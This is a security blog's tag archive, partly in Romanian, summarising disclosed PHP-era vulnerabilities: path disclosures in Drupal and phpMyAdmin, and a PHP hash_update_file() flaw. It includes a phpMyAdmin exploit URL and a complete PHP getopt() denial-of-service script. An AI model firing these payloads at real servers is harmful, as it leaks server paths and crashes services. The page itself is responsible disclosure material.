Posts Tagged exploit

Drupal 6.x, 7.x Search Module – Full Path Disclosure

Posted by Mihai in Vulnerabilităţi on March 14, 2012

Summary

Full path disclosure due to insufficient input validation in the search module.

Description

Performing a search with the “keys” parameter set as an array, an error message shows the full path of the Drupal installation, leading to possible further attacks.
For the error messages to be displayed, php.ini’s display_errors must be On.
Authentication: Not Needed
Read the rest of this entry »

drupal, exploit, Full Path Disclosure

No Comments

phpMyAdmin 3.4.5 – Full path disclosure in phpmyadmin.css.php

Posted by Mihai in Vulnerabilităţi on October 17, 2011

phpMyAdmin 3.4.5 suffers of insufficient input validation of the parameter js_frame in phpmyadmin.css.php, exposing information that could be used in further attacks.

CVE Entry: CVE-2011-3646
CWE: CWE-20, CWE-200
PMASA ENTRY: PMASA-2011-15

Description

The script returns an error message, containing the full path if the js_frame parameter is defined as an array.

Exploit

No authentication needed to exploit this vulnerability.

http://example.com/path_to_phpmyadmin/phpmyadmin.css.php?js_frame[]=right

Official fix

http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin;a=commitdiff;h=d35cba980893aa6e6455fd6e6f14f3e3f1204c52

Credits

Discovered by Mihail Ursu (securitate.md) on 12 Sep 2011.

Disclosure Timeline

Reported to vendor on 12 Sep 2011.
Confirmation from vendor 21 Sep 2011.
Patch confirmation 4 Oct 2011.
Official fix and public disclosure 17 Oct 2011.

exploit, Full Path Disclosure, path disclosure, phpmyadmin

No Comments

Vulnerabilitate PHP în funcţia hash_update_file()

Posted by Mihai in Vulnerabilităţi on May 11, 2010

Versiuni afectate: PHP 5.2 <=5.2.13
Consecinţe: Acces nesancţionat la resurse, executarea codului maliţios.
Instrucţiuni oficiale de utilizare a funcţiei: http://php.net/manual/en/function.hash-update-file.php

Descriere:

La chemarea funcţiei hash_update_file (), în primul rând se încearcă accesarea resurselor de date pentru o prelucrare ulterioară. Apoi se citesc datele din fluxul de date(stream) în scopul de hashing. O modificare maliţioasă a handler-ului către stream, poate distruge resursa hash din handler-ul citit la moment şi poate condiţiona înlocuirea handler-ului cu un altul, care conţine o modificare a tabelului de pointeri cu hash-uri. La continuarea procesului de hashing de către funcţia internă se va apela pointer-ul rescris şi se va încerca executarea unui cod maliţios.

Exploatarea vulnerabilităţii

Următorul script va încerca să exploateze această vulnerabilitate şi să cauzeze o execuţie în adresa 0×55555555, care în mod normal ar trebui să eşueze. Read the rest of this entry »

exploit, PHP, vulnerabilitate

No Comments

PHP 5.3.0 getopt() Denial of Service

Posted by Mihai in Exploits, Securitate Web on April 13, 2010

<?php
#####################################################################
## PHP 5.3.0 getopt() Denial of service
## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0
## Denial of service
## Author: Napst3r
## Greets To: My Laptop &  all My Friends
#####################################################################

$buffer  = str_repeat('A:', 9999);
$options = getopt($buffer);
 
?>